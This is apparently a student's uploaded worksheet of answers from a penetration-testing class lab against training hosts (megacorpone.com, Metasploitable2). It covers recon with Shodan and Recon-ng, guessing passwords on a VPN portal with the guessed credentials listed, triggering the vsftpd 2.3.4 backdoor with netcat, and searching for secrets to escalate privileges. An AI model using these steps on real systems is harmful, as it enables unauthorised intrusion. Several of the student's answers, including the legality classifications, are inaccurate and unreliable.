Add to collection(s) Add to saved
  1. No category
Uploaded by bananapancakesana

Pentesting Activity

advertisement 
ACTIVITY FINDINGS
PEN TEST 1
ACTIVITY 1: TYPES OF PEN TESTING
Scenario Questions
A business hires you to perform a penetration test. They said they will provide credentials for
you as long as you do not share them with anyone outside of the business. Before starting the
assessment, they’ve made you sign a non-disclosure agreement (NDA) and covered the rules of
engagement (ROE).
Legal
grey
A friend verbally asks you to hack his home network and gives you his public router’s IP
address.
Illegal
black
You are on a random shopping website and discover a potential vulnerability. Using your recent
knowledge from class, you attempt to validate whether the website is vulnerable to an attack.
Illegal
black
A local government hires you to perform a penetration test on their internal network, giving you
full access to all their network diagrams and their device IP list and supplying you with
administrative credentials. There is a contract in place to perform the assessment that is signed
by all appropriate parties.
White
legal
After negotiating a contract and signing all legal forms, an enterprise business hires you to
perform a penetration test. They supply you with a domain name that is in scope and a twomonth assessment time.
Legal
black
A family member asks you to assess their security on their home network. You bring your
laptop, connect to their WiFi, and begin the assessment with port scans.
Illegal
black
A business hires you to perform an assessment and sends over a contract that states all companyowned hardware is within scope and provides you a list of assets. When searching the public IP
addresses of the assets from the provided lists, you determine they are hosted within Microsoft’s
cloud platform, Azure.
illegal
grey
A medium-sized business hires you to perform a penetration test and supplies you with
credentials and scope. The contract is almost finalized, but the manager of the company is
insistent that you start the assessment now to avoid lapsing into their next fiscal year.
Illegal
partial
ACTIVITY 2
1. In a browser, navigate to Google.
2. Using the site Google operand, identify the web service name and version.
MegaCorpOne's website is megacorpone.com.
3. Using the intext and site operands, create a list of user names and their email addresses.
Tom thudson@megacorpone.com
Joe joe@megacorpone.com
Tanya trivera@megacorpone.com
Matt msmith@megacorpone.com
ACTIVITY 3
Instructions: 149.56.244.87 (shodan.io)
1. Navigate to https://account.shodan.io/register, and create a free account on Shodan.io.
2. After registering, log in and navigate to https://shodan.io.
3. In a terminal session, perform an nslookup on www.megacorpone.com.
4. In Shodan, search the IP address that was returned from the nslookup query.
5. Answer the following questions:
o
What ports are open? 22, 80, 443
o
What version of SSH is the server running? OpenSSH/SSH 2.0
o
What OS is the server? Debian 10
o
What is the version of the web server running? Apache Server 2.4.17 to 2.4.38
o
Which vulnerabilities may be present on the server? (CVE numbers are fine.)
o
Where is this server located? Montreal CA
ACTIVITY 4
Instructions
1. In Kali, log in with the credentials root:kali and start Recon-ng.
o In Recon-ng, run modules search to view all of the currently installed modules.
Modules search
o Run modules load recon/domains-hosts/hackertarget.
o This will load the hackertarget scanner module.
o
Modules need to be loaded prior to use.
2. In Recon-ng, type the command to view all of the currently installed modules.
Options list
o
For this activity, we'll use the following two modules:


recon/domains-hosts/hackertarget
reporting/html
3. Type the command that will query hackettarget.com for a scan against megacorpone.com.
Options set SOURCE megacorpone.com
o
The results will automatically display verbosely in the terminal window.
4. Install the reporting module then use the module.
Run
back
o
marketplace install reporting/html
5. Type the command that shows which parameters need to be set.
Options set CREATOR pentester
Options set CUSTOMER MEGACORPONE
o
The CREATOR and CUSTOMER parameters need to be set.
o
Set the parameters as follows:


o
o
CREATOR: Pentester
CUSTOMER: MegaCorpOne
Type the command that runs the query so the results are saved to /root/.reconng/workspaces/default/results.html.
Type the command that verifies whether the configuration took effect after setting
the options.
Options list
Run
6. View the report.
o
Generate the report so that it can be viewed as HTML in the web browser.
Xdg-open /root/.recon-ng/workspaces/default/results.html
o
How many hosts did Recon-ng discover?
18
PEN TEST 2
ACTIVITY 1
1. On your Kali machine, open the web browser, navigate to vpn.megacorpone.com,
where you will be prompted to log in.
2. Using the list of usernames that you obtained during Day 1 without the email
extension (e.g., bsmith instead of bsmith@megacorpone.com), attempt to log in
to the website by guessing basic passwords.
o
Hint: Try variants of "Password," "SeasonYear" (e.g., Summer2021), or even the
user's own username.
o
You only need to successfully guess ONE set of credentials to continue; the rest
are bonus.
mcarlow Pa55word
agrofield agrofield1
thudson thudson
triversa Spring2021
3. Once logged in, download the shell script in Kali and place it in
your Downloads folder (if it doesn't automatically download to it).
4. Change the permissions on the shell script to make it executable, then run the
shell script and log in with the same credentials that you just used.
chmod +x vpn.sh
./vpn.sh
Cat vpn.sh
ACT 2
ifconfig
zenmap
-
Intense scan
-
Edit profile (read about intense scan)
-
Edit profile  scripting  FTP backdoor
-
172.22.117.150 open port
ACT 3
1. Refer to your past Nmap or Zenmap scans, and look in the scan results for
Metasploitable2.
If you cannot find it by hostname, it will be the machine with the most
ports open.
2. Several of these services are exploitable; however, one is exploitable with a
Python script. Using searchsploit in Kali, search for any exploits around the
service that is listening on port 21. You're searching for an exploit that allows
you to execute a backdoor and is written in Python.
o It's important to examine scripts before running them. Some scripts
require variables to be edited within the script, whereas others can have
variables passed through the command line.
o
searchsploit vsftpd
 Backdoor
locate 49757.py
 File path
cat filepath/49757.py
 Make sure not a virus
python filepath/49757.py 172.22.117.150
 Buggy code rip
 But when we cat we can see it creates telnet to host on port 21, writing the user
and password in ascii
 User :) opens backdoor on port 6200
ftp 172.22.117.150
 Name: bob :)
 Password: anything
nc 172.22.117.150 6200
3. Edit the script in nano. The path that is listed on the right is relative to
the /usr/share/exploitdb/exploit directory,
e.g., /usr/share/exploitdb/exploit/unix/remote/xxxxx.py .
4. We can tell from the two variables args and host that this script accepts the IP
address of the vulnerable host as an argument, so there is no need to edit the
script. Close the script using ctrl+X.
5. Run the script without any arguments to see the output of the script.
6. Now, pass in the host IP address as an argument, and run the script again. You
should see a message saying “Success, shell opened.” Type in a Linux command
to check if the shell works.
DAY 3
ACTIVITY 1
For each framework that you've identified as a good candidate, answer the following
questions:
1. What is the name of the C2 framework? SCYTHE
2. What operating systems do its agents support? Windows, Linux, Mac
3. What channels can the agents communicate over? HTTP, DNS, SMB
4. What language is it written in? Python
5. Is it open or closed source? Closed
6. Does the developer have a Slack or Twitter link for potential support questions?
@scythe_io
ACT 2
For each exploit you attempted (failed or successful), document the following:

Exploit: vsftpd_234_backdoor

Host IP address: 172.22.117.150

Port: 21

Service name: FTP

Service version: 2.3.4

Exploit outcome: Success

Exploit: alienvault USM/OSSIM

Host IP address: 172.22.17.150

Port: 22

Service name: SSH

Service version: 5.3.0

Exploit outcome: Fail

Exploit: apache james

Host IP address: 172.22.17.150

Port: 25

Service name: SMTP

Service version:

Exploit outcome: Fail

Exploit: smtp_enum

Host IP address: 172.22.17.150

Port: 25

Service name: SMTP

Service version:

Exploit outcome: Success
While operating through the reverse shell in Metasploit, use grep or find to search for
any interesting files.
Hint 1: Some keywords to search for include:

admin

key

password

secret
If you come across anything interesting that could be used for privilege escalation,
perform the necessary actions in order to escalate your privileges from daemon to
another user!
Hint 2: If you forget the syntax for grep or find, use the man tool or use Google!
Bonus: Once you are able to escalate your privileges to another user, see if you can
escalate that user's privileges to root.
DAY 5
ACT 1
i.
How many Windows machines are on the network? 3
ii.
What ports/services are open on the machines that suggest that they're Windows
machines? 6001, 8080, 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3390
iii.
Can you tell which machine is the domain controller? First one, port 88 is the
giveaway
Related documents
Planning to Present a Report
Planning to Present a Report
Talk Show
Talk Show
02 Systems Software Programming-Shell Scripting Quiz (2)
02 Systems Software Programming-Shell Scripting Quiz (2)
ReadMe
ReadMe
Download
advertisement